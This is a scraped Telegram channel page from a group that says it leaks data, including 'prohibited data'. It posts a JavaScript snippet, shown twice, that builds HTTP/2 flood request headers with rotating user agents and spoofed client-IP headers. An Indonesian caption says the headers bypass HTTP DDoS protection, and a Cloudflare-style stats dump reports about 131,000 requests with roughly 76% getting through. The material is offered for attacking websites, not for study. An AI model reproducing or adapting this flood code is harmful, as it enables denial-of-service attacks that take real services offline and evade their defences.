LeakingCode | LC On Top!
前往频道在 Telegram
On this channel we leak data. The data that was leaked included various types of data ranging from general data to prohibited data and other similar things Channel Created By @Lintar21
显示更多1 757
订阅者
无数据24 小时
无数据7 天
+1730 天
帖子存档
Repost from LeakingCode | LC On Top!
function getRandomIP() {
return (
Math.floor(Math.random() * 256) + "." +
Math.floor(Math.random() * 256) + "." +
Math.floor(Math.random() * 256) + "." +
Math.floor(Math.random() * 256)
);
}
function getRandomUserAgent() {
const userAgents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:89.0) Gecko/20100101 Firefox/89.0",
"Mozilla/5.0 (Linux; Android 10; Pixel 3 XL Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Mobile Safari/537.36"
];
return userAgents[Math.floor(Math.random() * userAgents.length)];
}
let spoofedIP = getRandomIP();
let headers = {};
headers[":method"] = "GET";
// Target Path and Scheme
headers[":path"] = parsedTarget.path;// sesuaikan target di sinj
headers[":scheme"] = "https";
// Normal Headers
headers["Origin"] = parsedTarget.host;// sesuaikan target di sinj
headers["Referer"] = parsedTarget.host;
headers["User-Agent"] = getRandomUserAgent();
headers["Accept-Encoding"] = "gzip, deflate, br";
headers["Accept-Language"] = "en-US,en;q=0.9";
headers["Cache-Control"] = "no-cache";
headers["Pragma"] = "no-cache";
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8";
headers["Connection"] = "keep-alive";
headers["Cookie"] = "session=abc123; other_cookie=value";
// Spoofing Random IP
headers["X-Forwarded-For"] = spoofedIP;
headers["X-Forwarded-Host"] = spoofedIP;
headers["Client-IP"] = spoofedIP;
headers["Real-IP"] = spoofedIP;
headers["Via"] = "1.1 " + spoofedIP;
// Cross-Origin Headers (CORS-related headers)
headers["Access-Control-Allow-Origin"] = "*";
headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization";
// Miscellaneous Headers
headers["X-Requested-With"] = "XMLHttpRequest";
headers["Upgrade-Insecure-Requests"] = "1";
headers["Content-Security-Policy"] = "default-src 'self'";
headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains; preload";
// websocket header (kalau targetnya support)
headers["Sec-WebSocket-Key"] = "dGhlIHNhbXBsZSBub25jZQ==";
headers["Sec-WebSocket-Version"] = "13";
headers["Upgrade"] = "websocket";
Katanya headers simple buat bypass http ddos👑 CloudFlare 👑 🦄 Total Count: All Request ➥ 131173 Request Successful ➥ 100373 (76.52 %) Request Blocked ➥ 30800 (23.48 %) ➖➖➖➖➖➖➖ 🔫 Allowed Request: ➖➖➖➖➖➖➖ ➥ HTTP Protocol: HTTP/2 ➥ HTTP ResponseStatus: 200 ➥ Count: 100373 ➖➖➖➖➖➖➖ ➥ Count: 100373 ➥ Percentage: 76.52 % ➖➖➖➖➖➖➖ 🚁 Bypassed Request: ➖➖➖➖➖➖➖ ➥ Count: 0 ➥ Percentage: 0.00 % ➖➖➖➖➖➖➖ 🛡 Blocked Request: ➖➖➖➖➖➖➖ ➥ Count: 30747 ➥ Action: Block ➥ RequestHTTPMethod: GET ➥ RequestHTTPProtocol: HTTP/2 ➥ RequestScheme: https ➥ ResponseStatus: 403 ➥ Trigger Rules: HTTP DDos ➖➖➖➖➖➖➖ ➥ Count: 42 ➥ Action: Managed Challenge ➥ RequestHTTPMethod: GET ➥ RequestHTTPProtocol: HTTP/2 ➥ RequestScheme: https ➥ ResponseStatus: 403 ➥ Trigger Rules: Security Level ➖➖➖➖➖➖➖ ➥ Count: 11 ➥ Action: Managed Challenge ➥ RequestHTTPMethod: GET ➥ RequestHTTPProtocol: HTTP/1.1 ➥ RequestScheme: https ➥ ResponseStatus: 403 ➥ Trigger Rules: Security Level ➖➖➖➖➖➖➖ ➥ Count: 30800 ➥ Percentage: 23.48 % ➖➖➖➖➖➖➖ You are not currently in an invisible state, the statistics will be displayed in the leaderboard according to the ranking of the data Thanks for using this service🚗 Data from user: Lintar 🚗
function getRandomIP() {
return (
Math.floor(Math.random() * 256) + "." +
Math.floor(Math.random() * 256) + "." +
Math.floor(Math.random() * 256) + "." +
Math.floor(Math.random() * 256)
);
}
function getRandomUserAgent() {
const userAgents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:89.0) Gecko/20100101 Firefox/89.0",
"Mozilla/5.0 (Linux; Android 10; Pixel 3 XL Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Mobile Safari/537.36"
];
return userAgents[Math.floor(Math.random() * userAgents.length)];
}
let spoofedIP = getRandomIP();
let headers = {};
headers[":method"] = "GET";
// Target Path and Scheme
headers[":path"] = parsedTarget.path;// sesuaikan target di sinj
headers[":scheme"] = "https";
// Normal Headers
headers["Origin"] = parsedTarget.host;// sesuaikan target di sinj
headers["Referer"] = parsedTarget.host;
headers["User-Agent"] = getRandomUserAgent();
headers["Accept-Encoding"] = "gzip, deflate, br";
headers["Accept-Language"] = "en-US,en;q=0.9";
headers["Cache-Control"] = "no-cache";
headers["Pragma"] = "no-cache";
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8";
headers["Connection"] = "keep-alive";
headers["Cookie"] = "session=abc123; other_cookie=value";
// Spoofing Random IP
headers["X-Forwarded-For"] = spoofedIP;
headers["X-Forwarded-Host"] = spoofedIP;
headers["Client-IP"] = spoofedIP;
headers["Real-IP"] = spoofedIP;
headers["Via"] = "1.1 " + spoofedIP;
// Cross-Origin Headers (CORS-related headers)
headers["Access-Control-Allow-Origin"] = "*";
headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization";
// Miscellaneous Headers
headers["X-Requested-With"] = "XMLHttpRequest";
headers["Upgrade-Insecure-Requests"] = "1";
headers["Content-Security-Policy"] = "default-src 'self'";
headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains; preload";
// websocket header (kalau targetnya support)
headers["Sec-WebSocket-Key"] = "dGhlIHNhbXBsZSBub25jZQ==";
headers["Sec-WebSocket-Version"] = "13";
headers["Upgrade"] = "websocket";
Katanya headers simple buat bypass http ddos